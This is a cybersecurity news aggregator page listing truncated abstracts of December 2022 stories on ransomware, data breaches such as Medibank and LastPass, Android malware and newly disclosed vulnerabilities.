Multiple unpatched vulnerabilities have been discovered in three Android apps that allow a smartphone to be used as a remote keyboard and mouse. The apps in question are Lazy Mouse, PC Keyboard, and Telepad, which have been cumulatively downloaded over two million times from the Google Play Store. Telepad is no longer available through the app marketplace but can be downloaded from its website. The affected packages are Lazy Mouse (com.ahmedaay.lazymouse2 and com.ahmedaay.lazymousepro); PC Keyboard (com.beapps.pckeyboard); and Telepad (com.pinchtools.telepad). While these apps function by connecting to a server on a desktop and transmitting to it the mouse and keyboard events, the Synopsys Cybersecurity Research Center (CyRC) found as many as seven flaws related to weak or missing authentication, missing authorization, and insecure communication. The issues (from CVE-2022-45477 through CVE-2022-45483), in a nutshell, could be exploited by a malicious actor to execute arbitrary commands sans authenticati – The Hacker News
December 2, 2022 – Criminals
Ransomware group may have stolen customer bank details from British water company Full Text
Abstract
The affected details include the names and addresses associated with customers’ accounts as well as the bank details used to set up direct debit payments. The company said it is writing letters to the affected customers. – The Record
Dec 02, 2022 – Criminals
Cuba Ransomware Extorted Over $60 Million in Ransom Fees from More than 100 Entities Full Text
Abstract
The threat actors behind Cuba (aka COLDDRAW) ransomware have received more than $60 million in ransom payments and compromised over 100 entities across the world as of August 2022. In a new advisory shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies highlighted a "sharp increase in both the number of compromised U.S. entities and the ransom amounts." The ransomware crew, also known as Tropical Scorpius, has been observed targeting financial services, government facilities, healthcare, critical manufacturing, and IT sectors, while simultaneously expanding its tactics to gain initial access and interact with breached networks. It's worth noting that despite the name "Cuba," there is no evidence to suggest that the actors have any connection or affiliation with the island country. The entry point for the attacks involves the exploitation of known security flaws, phishing, – The Hacker News
December 01, 2022 – Breach
Samsung, LG, Mediatek certificates compromised to sign Android malware Full Text
Abstract
Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications have also been used to sign Android apps containing malware. – BleepingComputer
Dec 01, 2022 – Malware
Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, & Windows Zero-Days Full Text
Abstract
A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018. "Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device," Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up. Variston, which has a bare-bones website, claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support "the discovery of digital information by [law enforcement agencies]," among other services. The vulnerabilities, which have been patched by Google, Microsoft, and Mozilla in 2021 and early 2022, are believed to – The Hacker News
Dec 01, 2022 – Breach
Hackers Leak Another Set of Medibank Customer Data on the Dark Web Full Text
Abstract
Medibank on Thursday confirmed that the threat actors behind the devastating cyber attack have posted another dump of data stolen from its systems on the dark web after its refusal to pay a ransom. "We are in the process of analyzing the data, but the data released appears to be the data we believed the criminal stole," the Australian health insurer said. "While our investigation continues there are currently no signs that financial or banking data has been taken. And the personal data stolen, in itself, is not sufficient to enable identity and financial fraud. The raw data we have analyzed today so far is incomplete and hard to understand." The leak comes almost a month after the company acknowledged that personal data belonging to around 9.7 million of its current and former customers were accessed following a ransomware incident in October 2022. This includes 5.1 million Medibank customers, 2.8 million ahm customers, and 1.8 million international cust – The Hacker News
Dec 01, 2022 – Vulnerabilities
Researchers Disclose Critical RCE Vulnerability Affecting Quarkus Java Framework Full Text
Abstract
A critical security vulnerability has been disclosed in the Quarkus Java framework that could be potentially exploited to achieve remote code execution on affected systems. Tracked as CVE-2022-4116 (CVSS score: 9.8), the shortcoming could be trivially abused by a malicious actor without any privileges. "The vulnerability is found in the Dev UI Config Editor, which is vulnerable to drive-by localhost attacks that could lead to remote-code execution (RCE)," Contrast Security researcher Joseph Beeton, who reported the bug, said in a write-up. Quarkus, developed by Red Hat, is an open source project that's used for creating Java applications in containerized and serverless environments. It's worth pointing out that the issue only impacts developers who are running Quarkus and are tricked into visiting a specially crafted website, which is embedded with malicious JavaScript code designed to install or execute arbitrary payloads. This could take the form o – The Hacker News
Dec 01, 2022 – Education
What Developers Need to Fight the Battle Against Common Vulnerabilities Full Text
Abstract
Today's threat landscape is constantly evolving, and now more than ever, organizations and businesses in every sector have a critical need to consistently produce and maintain secure software. While some verticals - like the finance industry, for example - have been subject to regulatory and compliance requirements for some time, we are seeing a steady increase in attention on cybersecurity best practices at the highest levels of government, with the US, UK, and Australia all shining very recent light on the need for secure development at every stage of the SDLC. Despite this, attackers are constantly finding new ways to bypass even the most advanced protections and defenses. For example, many have shifted their focus from delivering malware to instead compromising APIs, or launching targeted attacks against a supply chain. And while those high-level incidents are happening with much greater frequency, so too are the more simplistic exploits like cross-site scripting and SQL i – The Hacker News
Dec 01, 2022 – Malware
Schoolyard Bully Trojan Apps Stole Facebook Credentials from Over 300,000 Android Users Full Text
Abstract
More than 300,000 users across 71 countries have been victimized by a new Android threat campaign called the Schoolyard Bully Trojan. Mainly designed to steal Facebook credentials, the malware is camouflaged as legitimate education-themed applications to lure unsuspecting users into downloading them. The apps, which were available for download from the official Google Play Store, have now been taken down. That said, they still continue to be available on third-party app stores. "This trojan uses JavaScript injection to steal the Facebook credentials," Zimperium researchers Nipun Gupta and Aazim Bill SE Yaswant said in a report shared with The Hacker News. It achieves this by launching Facebook's login page in a WebView, which also embeds within it malicious JavaScript code to exfiltrate the user's phone number, email address, and password to a configured command-and-control (C2) server. The Schoolyard Bully Trojan further makes use of native libraries such – The Hacker News
Dec 01, 2022 – Cryptocurrency
Researchers ‘Accidentally’ Crash KmsdBot Cryptocurrency Mining Botnet Network Full Text
Abstract
An ongoing analysis into an up-and-coming cryptocurrency mining botnet known as KmsdBot has led to it being accidentally taken down. KmsdBot, as christened by the Akamai Security Intelligence Response Team (SIRT), came to light mid-November 2022 for its ability to brute-force systems with weak SSH credentials. The botnet strikes both Windows and Linux devices spanning a wide range of microarchitectures with the primary goal of deploying mining software and corralling the compromised hosts into a DDoS bot. Some of the major targets included gaming firms, technology companies, and luxury car manufacturers. Akamai researcher Larry W. Cashdollar, in a new update, explained how commands sent to the bot to understand its functionality in a controlled environment inadvertently neutralized the malware. "Interestingly, after one single improperly formatted command, the bot stopped sending commands," Cashdollar said. "It's not every day you come across a botnet t – The Hacker News
Dec 01, 2022 – Breach
LastPass Suffers Another Security Breach; Exposed Some Customers Information Full Text
Abstract
Popular password management service LastPass said it's investigating a second security incident that involved attackers accessing some of its customer information. "We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo," LastPass CEO Karim Toubba said. GoTo, formerly called LogMeIn, acquired LastPass in October 2015. In December 2021, the Boston-based firm announced plans to spin off LastPass as an independent company. The digital break-in resulted in the unauthorized third-party leveraging information obtained following a previous breach in August 2022 to access "certain elements of our customers' information." The August 2022 security event targeted its development environment, leading to the theft of some of its source code and technical information. In September, LastPass revealed the threat actor had access for four days. The scope of the breach – The Hacker News
December 01, 2022 – Malware
Android malware infected 300,000 devices to steal Facebook accounts Full Text
Abstract
An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices. – BleepingComputer
December 1, 2022 – General
What’s Going on with FinServ? Cybersecurity Edition Full Text
Abstract
The financial services sector has been hit by cybercriminals again and again - ranging from ransomware attacks to DDoS attacks to phishing. There is a 3.5 times increase (257%) in web app and API attacks, year-over-year. 32% of organizations in the financial services sector observed accidental... – Cyware Alerts - Hacker News
December 1, 2022 – General
Private-Sector Cyber Defense in Armed Conflict Full Text
Abstract
The private sector is playing an integral role in Ukrainian cyber defense in the armed conflict between Russia and Ukraine. – Lawfare
December 1, 2022 – Malware
New Go-based Redigo malware targets Redis servers Full Text
Abstract
Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat... – Security Affairs
December 01, 2022 – Government
FBI: Cuba ransomware raked in $60 million from over 100 victims Full Text
Abstract
The FBI and CISA revealed in a new joint security advisory that the Cuba ransomware gang raked in over $60 million in ransoms as of August 2022 after breaching more than 100 victims worldwide.BleepingComputer
December 1, 2022 – Breach
Schoolyard Bully Trojan Steals Facebook Credentials Across 71 Countries via Fake Educational Apps Full Text
Abstract
Disguised as the good guy, these malicious apps known as the “Schoolyard Bully Trojan” are camouflaged as legitimate, educational applications with a wide range of books and topics for their victims to read.Zimperium
December 1, 2022 – General
3 of the Worst Data Breaches in the World That Could Have Been Prevented Full Text
Abstract
Data breaches can be devastating for organizations; these are 3 of the worst incidents that could have been prevented. Data breaches can be devastating for organizations and even entire countries. Eliminating the risk of a data breach is nearly impossible,...Security Affairs
December 01, 2022 – Malware
New Redigo malware drops stealthy backdoor on Redis servers Full Text
Abstract
A new Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution.BleepingComputer
December 1, 2022 – Education
The Evolution of Business Email Compromise Full Text
Abstract
While the threat has evolved, threat actors continue to use phishing attacks to steal credentials and then send fraudulent invoices soliciting payment. Thousands of organizations have lost billions of dollars.Dark Reading
December 1, 2022 – APT
North Korea ScarCruft APT used previously undetected Dolphin Backdoor against South Korea Full Text
Abstract
North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by North...Security Affairs
December 01, 2022 – Malware
New DuckLogs malware service claims having thousands of ‘customers’ Full Text
Abstract
A new malware-as-a-service (MaaS) operation named 'DuckLogs' has emerged, giving low-skilled attackers easy access to multiple modules to steal information, log keystrokes, access clipboard data, and gain remote access to the compromised host.BleepingComputer
December 1, 2022 – Vulnerabilities
Exchange Server bugs caused years of security turmoil Full Text
Abstract
Nearly two years after the first series of Microsoft Exchange Server vulnerabilities became known, four collections of high-profile bugs are likely to remain a headache for enterprises for the foreseeable future.Tech Target
December 1, 2022 – Breach
LastPass discloses the second security breach this year Full Text
Abstract
LastPass disclosed a new security breach: threat actors had access to its cloud storage using information stolen in the August 2022 breach. Password management solution LastPass disclosed a new security breach; the attackers had access to a third-party...Security Affairs
December 01, 2022 – Vulnerabilities
Hyundai app bugs allowed hackers to remotely unlock, start cars Full Text
Abstract
Vulnerabilities in mobile apps exposed Hyundai and Genesis car models after 2012 to remote attacks that allowed unlocking and even starting the vehicles.BleepingComputer
December 1, 2022 – Vulnerabilities
Chrome 108 Patches High-Severity Memory Safety Bugs Full Text
Abstract
Google this week announced the release of Chrome 108 in the stable channel with patches for 28 vulnerabilities, including 22 reported by external researchers. Of those 22, eight are high-severity issues and 14 are medium-severity flaws.Security Week
December 1, 2022 – Criminals
New Exploit Broker on the Scene Pays Premium for Signal App Zero-Days Full Text
Abstract
Russia-based OpZero went on the record recently with a $1.5 million offer for Signal remote code execution (RCE) exploits, more than tripling the relatively stable high-water mark for that app offered by American firm Zerodium.Dark Reading
December 1, 2022 – Malware
ScarCruft’s New Dolphin Backdoor Uses Google Drive for C&C Communication Full Text
Abstract
The backdoor has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers.ESET Security
December 1, 2022 – General
Security pros feel threat detection and response workloads have increased Full Text
Abstract
A new report conducted by Enterprise Strategy Group (ESG) highlights why today’s security teams find it increasingly difficult to detect and stop cyber threats targeting their organizations.Help Net Security
December 01, 2022 – Hacker
North Korea Hackers Using New “Dolphin” Backdoor to Spy on South Korean Targets Full Text
Abstract
The North Korea-linked ScarCruft group has been attributed to a previously undocumented backdoor called Dolphin that the threat actor has used against targets located in its southern counterpart. "The backdoor [...] has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers," ESET researcher Filip Jurčacko said in a new report published today. Dolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control. The Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper. The campaign, first uncovered by Kaspersky and Volexity last year, entailed the weaponization of two Internet Explorer flaws (CVE-2020-1380The Hacker News